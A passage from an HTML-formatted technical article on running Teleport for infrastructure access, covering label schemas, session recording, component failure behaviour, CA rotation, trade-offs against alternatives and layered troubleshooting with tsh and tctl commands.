        &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Required&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;for&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;all&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;production&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;access&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;requests"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Implement a Governed Resource Labels Strategy
&lt;/h3&gt;

&lt;p&gt;Treat labels as a typed contract, not freeform metadata. Define your schema upfront and enforce it via IaC (Terraform, Pulumi). Ad-hoc labeling leads to RBAC drift — resources silently entering or leaving access scope without review.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Consistent labeling scheme — define this schema org-wide and enforce it&lt;/span&gt;
&lt;span class="na"&gt;ssh_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;        &lt;span class="c1"&gt;# Required: dev | staging | production&lt;/span&gt;
    &lt;span class="na"&gt;team&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;          &lt;span class="c1"&gt;# Required: maps to owning team&lt;/span&gt;
    &lt;span class="na"&gt;region&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-west-2&lt;/span&gt;      &lt;span class="c1"&gt;# Required: for geo-scoped roles&lt;/span&gt;
    &lt;span class="na"&gt;compliance&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pci-dss&lt;/span&gt;    &lt;span class="c1"&gt;# Optional: compliance scope tags&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; If a label isn't defined in your schema, it shouldn't be on a resource. Audit for unlabeled or non-conforming resources regularly.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Enable Session Recording for All Production Access
&lt;/h3&gt;

&lt;p&gt;Always record production sessions. Storage cost is negligible compared to the forensic and compliance value. Use &lt;code&gt;node&lt;/code&gt; mode for large fleets (distributes load); use &lt;code&gt;proxy&lt;/code&gt; mode when tamper-resistance from the agent side is a compliance requirement.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production-access&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;record_session&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;desktop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="na"&gt;default&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;node&lt;/span&gt;   &lt;span class="c1"&gt;# Use 'proxy' if you need centralized, tamper-resistant recording&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Development roles can use &lt;code&gt;default: off&lt;/code&gt; to reduce storage costs, but staging environments should mirror production recording policy.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Integrate with Your Security Stack
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Forward audit logs to SIEM (Splunk, Elasticsearch)&lt;/li&gt;
&lt;li&gt;Send alerts to incident response tools&lt;/li&gt;
&lt;li&gt;Integrate access requests with ticketing systems&lt;/li&gt;
&lt;li&gt;Use webhooks for custom workflows&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Failure Modes and Operational Realities
&lt;/h2&gt;

&lt;p&gt;Understanding failure behavior is essential for operating Teleport in production. A system you can't reason about under failure is a system you can't trust.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Component Failure Behavior
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Failure Impact&lt;/th&gt;
&lt;th&gt;Active Sessions&lt;/th&gt;
&lt;th&gt;New Sessions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Auth Service&lt;/td&gt;
&lt;td&gt;Cannot issue new certificates&lt;/td&gt;
&lt;td&gt;Continue (until cert expires)&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Proxy Service&lt;/td&gt;
&lt;td&gt;All inbound access unavailable&lt;/td&gt;
&lt;td&gt;Dropped&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Backend (DB/DynamoDB) degraded&lt;/td&gt;
&lt;td&gt;Auth latency spikes, audit log lag&lt;/td&gt;
&lt;td&gt;Likely continue (cached state)&lt;/td&gt;
&lt;td&gt;Degraded/slow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Single Proxy in HA cluster&lt;/td&gt;
&lt;td&gt;Remaining proxies absorb traffic&lt;/td&gt;
&lt;td&gt;Disrupted briefly&lt;/td&gt;
&lt;td&gt;Rerouted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent&lt;/td&gt;
&lt;td&gt;Resources behind that agent unreachable&lt;/td&gt;
&lt;td&gt;Terminated&lt;/td&gt;
&lt;td&gt;Blocked for those resources&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Key takeaways:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The Auth Service is the highest-impact single point of failure in a non-HA deployment. Existing sessions continue until their certificate TTL expires, but no new access can be established. &lt;strong&gt;This is the #1 reason to deploy Auth in HA mode for any production environment.&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Proxy failure is immediately user-visible — all active sessions terminate. Multiple Proxies behind a load balancer are non-negotiable for production.&lt;/li&gt;
&lt;li&gt;Backend degradation creates a "slow door" scenario: the system keeps working but sluggishly, often producing confusing timeout errors that look like network issues.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  CA Rotation
&lt;/h3&gt;

&lt;p&gt;CA rotation is the nuclear option for credential invalidation — it invalidates all outstanding certificates cluster-wide. This is powerful but operationally non-trivial:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Rotation has a &lt;strong&gt;grace period&lt;/strong&gt; where both old and new CA are trusted simultaneously&lt;/li&gt;
&lt;li&gt;All agents must pick up the new CA before the grace period ends&lt;/li&gt;
&lt;li&gt;Any agent that doesn't rotate in time will start rejecting connections&lt;/li&gt;
&lt;li&gt;Rotation of a large fleet requires careful monitoring and rollout coordination&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; Test CA rotation in staging at least once before you need it in production under incident conditions.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  RBAC Sprawl
&lt;/h3&gt;

&lt;p&gt;Label-based RBAC scales beautifully at small size and becomes a maintenance burden at scale if not governed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Undocumented labels&lt;/strong&gt; on resources create invisible access grants&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Role proliferation&lt;/strong&gt; — teams creating one-off roles instead of composing existing ones — makes audit reviews painful&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Label drift&lt;/strong&gt; — resources retagged without RBAC review can accidentally expand access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Treat labels as a contract, not metadata. Enforce label schemas via infrastructure-as-code and audit them as part of change review.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Debugging is Harder Than Direct SSH Because Teleport Introduces Multiple Control Points — Each a Potential Failure Boundary
&lt;/h3&gt;

&lt;p&gt;Teleport adds indirection. When access fails, the failure could be at any layer:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Certificate expired or wrong cluster&lt;/li&gt;
&lt;li&gt;RBAC label mismatch&lt;/li&gt;
&lt;li&gt;Reverse tunnel down (agent offline)&lt;/li&gt;
&lt;li&gt;Proxy routing issue&lt;/li&gt;
&lt;li&gt;Network connectivity between Proxy and Agent&lt;/li&gt;
&lt;li&gt;Resource itself refusing connection&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The &lt;code&gt;tsh status&lt;/code&gt;, &lt;code&gt;tctl nodes ls&lt;/code&gt;, and Proxy Service logs are your first three debugging tools. Build runbooks for common failure paths before you need them at 2am.&lt;/p&gt;




&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs, Limitations, and Alternatives
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Teleport Trade-offs
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;Trade-off&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Latency&lt;/td&gt;
&lt;td&gt;Teleport adds an extra network and TLS hop on every connection — negligible for interactive SSH sessions, but noticeable for high-throughput or latency-sensitive database workloads. Benchmark before assuming it's acceptable.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Complexity&lt;/td&gt;
&lt;td&gt;You're now operating a control plane (Auth + Proxy + Backend). This is less complex than a VPN + bastion + key management stack, but it's still infrastructure you own and must keep healthy.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lock-in&lt;/td&gt;
&lt;td&gt;Strong coupling to Teleport's certificate model, RBAC system, and agent deployment. Migrating away is non-trivial.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Debugging&lt;/td&gt;
&lt;td&gt;Failures are less transparent than direct SSH. Every hop is a potential failure point.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost&lt;/td&gt;
&lt;td&gt;Self-hosted requires infra + ops investment. Enterprise features (Device Trust, Access Monitoring, Policy) add license cost.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CA rotation&lt;/td&gt;
&lt;td&gt;Invalidating all credentials is operationally complex and requires advance planning.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What Teleport Does NOT Solve
&lt;/h3&gt;

&lt;p&gt;Teleport enforces access at the &lt;strong&gt;entry point&lt;/strong&gt;, not within the system. It secures the &lt;em&gt;path&lt;/em&gt; to infrastructure — it does not secure what happens &lt;em&gt;inside&lt;/em&gt; infrastructure after access is granted:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Application-level authorization&lt;/strong&gt;: Teleport gets you a shell or a DB connection. What you do with it is governed by application and database permissions, not Teleport.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lateral movement inside a host&lt;/strong&gt;: Once a user has SSH access to a server, they can attempt to move laterally to other systems reachable from that host. Teleport doesn't prevent this.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compromised workloads&lt;/strong&gt;: If a service running on a server is compromised, that service can use its existing credentials. Teleport doesn't protect against post-exploitation of running workloads.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secrets inside applications&lt;/strong&gt;: Environment variables, config files, and secrets managers are outside Teleport's scope.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Insider threats post-access&lt;/strong&gt;: Teleport records &lt;em&gt;what&lt;/em&gt; was done, which helps with detection and forensics — but it doesn't prevent a malicious authorized user from exfiltrating data during their session.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Teleport is one layer of a defense-in-depth strategy, not a complete security posture.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Comparison With Modern Alternatives
&lt;/h3&gt;

&lt;p&gt;Teleport is not the only approach to modern infrastructure access:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;Strengths&lt;/th&gt;
&lt;th&gt;Weaknesses vs Teleport&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AWS SSM / IAM Identity Center&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Infrastructure-native&lt;/td&gt;
&lt;td&gt;No agent to maintain on AWS resources, native IAM integration&lt;/td&gt;
&lt;td&gt;AWS-only, limited protocol support, weaker audit UI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cloudflare Access / Zero Trust&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Identity-aware proxy&lt;/td&gt;
&lt;td&gt;Excellent for web apps and browser-based access, global PoPs&lt;/td&gt;
&lt;td&gt;Weaker for SSH/DB/K8s native protocol support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Tailscale&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Mesh VPN + identity&lt;/td&gt;
&lt;td&gt;Very simple to operate, low overhead, great for small teams&lt;/td&gt;
&lt;td&gt;No session recording, weaker RBAC, not compliance-oriented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;BeyondCorp (Google)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Device + identity aware proxy&lt;/td&gt;
&lt;td&gt;Proven at extreme scale&lt;/td&gt;
&lt;td&gt;Expensive, complex to replicate outside Google's ecosystem&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CyberArk / HashiCorp Vault&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;PAM / secrets management&lt;/td&gt;
&lt;td&gt;Deep secrets management, strong enterprise PAM&lt;/td&gt;
&lt;td&gt;More complex to operate, less developer-friendly UX&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Where Teleport fits:&lt;/strong&gt; Teleport sits between identity-aware proxies (Cloudflare, BeyondCorp) and infrastructure-native access systems (SSM). It offers deeper protocol-level control and richer session recording than most ZTNA tools, at the cost of a more complex control plane to operate.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  When Teleport Becomes a Bad Idea
&lt;/h3&gt;

&lt;p&gt;Teleport shines in complexity — not simplicity. There are clear situations where adopting it is the wrong call:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;100% AWS with SSM already working well:&lt;/strong&gt; If your infrastructure is AWS-native and your team already uses SSM + IAM Identity Center effectively, Teleport adds a new control plane without proportionate gain. SSM is simpler to operate and deeply integrated with IAM.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Small teams (&amp;lt; 10 engineers):&lt;/strong&gt; The operational overhead — HA deployment, CA rotation, RBAC governance, agent fleet management — often outweighs the security benefits at small scale. A well-configured bastion with short-lived keys and MFA may be the right answer.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cannot operate HA control planes reliably:&lt;/strong&gt; If you are not prepared to operate a highly available control plane, Teleport becomes a single point of failure rather than a security improvement. A single-node Auth Service gates every infrastructure connection in your environment — that's a harder failure than a downed bastion, which only blocked SSH.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ultra-low latency or high-throughput DB access:&lt;/strong&gt; Every connection transits the Proxy. For latency-sensitive or bulk-transfer database workloads, the proxying overhead is real and measurable. Benchmark before committing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Team lacks operational maturity for a distributed control plane:&lt;/strong&gt; Teleport failures are subtle. A team that isn't comfortable debugging reverse tunnel health, CA states, and RBAC label interactions will find it harder to operate than what it replaced.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The honest test:&lt;/strong&gt; If someone on your team can't answer "what happens when the Auth Service goes down?", you're not ready to run Teleport in production.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How Teams Typically Adopt Teleport
&lt;/h3&gt;

&lt;p&gt;Teleport adoption is rarely a single migration — it's an incremental replacement of legacy access patterns. Teams that succeed tend to follow a similar path:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Replace bastion SSH access&lt;/strong&gt; — lowest risk, highest immediate visibility gain&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Add Kubernetes and database access&lt;/strong&gt; — consolidates the access model across protocols&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Introduce Access Requests for production&lt;/strong&gt; — eliminates standing privileges for the highest-risk tier&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enable session recording for compliance&lt;/strong&gt; — adds the audit trail needed for SOC 2, PCI, HIPAA&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Expand into multi-cluster federation&lt;/strong&gt; — scales the model to multiple regions or business units&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each stage delivers value independently. You don't need to complete stage 5 to justify the investment at stage 1.&lt;/p&gt;




&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Opinionated Architecture Guidance
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Rules of Thumb for Production Deployments
&lt;/h3&gt;

&lt;p&gt;These aren't configuration options — they're operational decisions that most teams learn the hard way:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Certificate TTLs:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Production access: ≤ 8 hours. Shorter is better. 4 hours is a reasonable default.&lt;/li&gt;
&lt;li&gt;Bot/automation tokens: ≤ 1 hour. Treat like API keys with aggressive expiry.&lt;/li&gt;
&lt;li&gt;Development access: 24 hours is acceptable. Convenience at lower risk.&lt;/li&gt;
&lt;li&gt;Never set &lt;code&gt;max_session_ttl&lt;/code&gt; longer than your incident response SLA — if a credential is compromised, you need it to expire before your team can respond.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Access design:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Never grant direct production roles to humans. Always require Access Requests with approval for elevated access. The friction is the feature.&lt;/li&gt;
&lt;li&gt;Treat labels as a typed API, not freeform metadata. Define a label schema (env, team, region, compliance) and enforce it via IaC. Label drift creates silent access grants.&lt;/li&gt;
&lt;li&gt;Prefer role composition over role proliferation. Five composable roles are easier to audit than fifty specialized ones.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Cluster topology:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use a single cluster until you have a concrete reason not to. Trusted Clusters add operational overhead — don't adopt them for organizational tidiness alone.&lt;/li&gt;
&lt;li&gt;Reach for Trusted Clusters when: you need hard security isolation between environments (e.g., production vs. customer tenants), you're operating in multiple regions with latency-sensitive access, or you're managing customer-isolated environments as an MSP.&lt;/li&gt;
&lt;li&gt;Avoid auto-discovery in highly dynamic environments without governance controls on labeling — auto-discovered resources with unreviewed labels can silently enter RBAC scope.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Session recording:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use &lt;code&gt;node&lt;/code&gt; mode for large fleets. The distributed load model scales better.&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;proxy&lt;/code&gt; mode when you have strict compliance requirements and need recording to be tamper-proof from the agent side.&lt;/li&gt;
&lt;li&gt;Always record production. Storage cost is negligible compared to the compliance and forensic value.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Troubleshooting Common Issues
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Debugging Mental Model:&lt;/strong&gt; Always trace the path: &lt;strong&gt;User → Proxy → Tunnel → Agent → Resource&lt;/strong&gt;. Failures almost always occur at boundaries between these layers — start at the user end and walk forward until you find where the chain breaks.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Teleport adds multiple layers between a user and a resource. When something fails, work through the layers in order rather than jumping straight to logs. Most failures are in layers 1–3.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Layer 1: Certificate (user)         → tsh status
Layer 2: RBAC / label match         → tctl get roles, check node labels
Layer 3: Agent health               → tctl nodes ls, agent logs
Layer 4: Reverse tunnel             → Proxy logs, tctl status
Layer 5: Network (Proxy ↔ Agent)    → connectivity check, firewall rules
Layer 6: Resource itself            → resource-side logs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Concrete example — SSH connection fails:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. tsh ssh prod-server fails
   → tsh status: cert valid, roles present ✓
   → tctl nodes ls: prod-server not in list ✗

2. Agent offline — check agent logs on the server
   → Agent can't reach Proxy on port 443
   → Firewall rule blocking outbound from the new subnet ✗

Resolution: Add egress rule. Agent reconnects, node appears in inventory.

Key insight: The failure looked like an SSH problem.
It was a network problem between Agent and Proxy — two layers removed from where the user felt the error.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Most issues are not in the SSH layer — they are in the identity or routing layers above it.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Connection Issues
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;: Cannot connect to a resource through Teleport&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Check&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Certificate is not expired: &lt;code&gt;tsh status&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;User has appropriate role: &lt;code&gt;tsh status&lt;/code&gt; shows roles&lt;/li&gt;
&lt;li&gt;Resource labels match role's &lt;code&gt;node_labels&lt;/code&gt; / &lt;code&gt;db_labels&lt;/code&gt; / etc. — this is the most common silent failure&lt;/li&gt;
&lt;li&gt;Agent is online: &lt;code&gt;tctl nodes ls&lt;/code&gt; or Web UI (offline agent = resource disappears from inventory)&lt;/li&gt;
&lt;li&gt;Reverse tunnel is established: Check Proxy Service logs for tunnel registration events&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Certificate Issues
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;: Certificate verification failures&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Causes&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Certificate expired (re-login with &lt;code&gt;tsh login&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;CA rotation in progress — agents that haven't yet picked up the new CA will reject connections; monitor rotation progress carefully&lt;/li&gt;
&lt;li&gt;Time skew between systems (sync NTP — even a few seconds of drift causes cert validation to fail)&lt;/li&gt;
&lt;li&gt;Wrong cluster (verify &lt;code&gt;--proxy&lt;/code&gt; parameter matches the target cluster)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Performance Issues
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;: Slow connections or timeouts&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Check&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network latency between Proxy and Agent — the reverse tunnel adds a round-trip; high-latency paths between Proxy and Agent are directly user-visible&lt;/li&gt;
&lt;li&gt;Backend storage performance — slow DynamoDB or PostgreSQL manifests as slow auth, slow resource listing, and delayed audit writes&lt;/li&gt;
&lt;li&gt;Session recording mode — &lt;code&gt;proxy&lt;/code&gt; mode under high load is a common but non-obvious bottleneck; consider switching to &lt;code&gt;node&lt;/code&gt; mode or scaling Proxy horizontally&lt;/li&gt;
&lt;li&gt;Reverse tunnel health — a degraded tunnel causes intermittent timeouts that are easy to mistake for network issues&lt;/li&gt;
&lt;li&gt;Agent resource usage (CPU, memory) — DB agents under high connection volume are a frequent culprit&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Teleport represents a meaningful shift in how organizations secure infrastructure access — replacing long-lived credentials with short-lived certificates, eliminating VPN perimeters with reverse tunnels, and providing comprehensive audit logging across protocols.&lt;/p&gt;

&lt;p&gt;But it's worth being precise about what that shift entails. Teleport is not just an access tool — it is a &lt;strong&gt;distributed identity and access control plane&lt;/strong&gt; that sits on the critical path of every infrastructure connection. You operate it, rotate its CA, govern its RBAC, and debug it at 2am. The security benefits are real. So are the operational costs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Takeaways:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Certificate-Based Authentication&lt;/strong&gt;: As covered in the architecture section, short-lived certificates eliminate standing credentials — but authorization still depends on centrally issued roles, and revocation requires CA rotation or lockout, not a simple flag.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust Architecture&lt;/strong&gt;: Every connection is independently authenticated and authorized, regardless of network location. Teleport eliminates network-based trust — it does not eliminate the need for application-level authorization, secrets management, or lateral movement controls.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Unified Access&lt;/strong&gt;: Single platform for SSH, Kubernetes, databases, applications, and desktops.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Protocol Native&lt;/strong&gt;: Works with existing tools (&lt;code&gt;ssh&lt;/code&gt;, &lt;code&gt;kubectl&lt;/code&gt;, &lt;code&gt;psql&lt;/code&gt;) without requiring new clients.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Comprehensive Audit&lt;/strong&gt;: Complete visibility into who accessed what, when, and what they did — session recording, event logs, and Access Request trails.&lt;/li&gt;
&lt;li&gt;
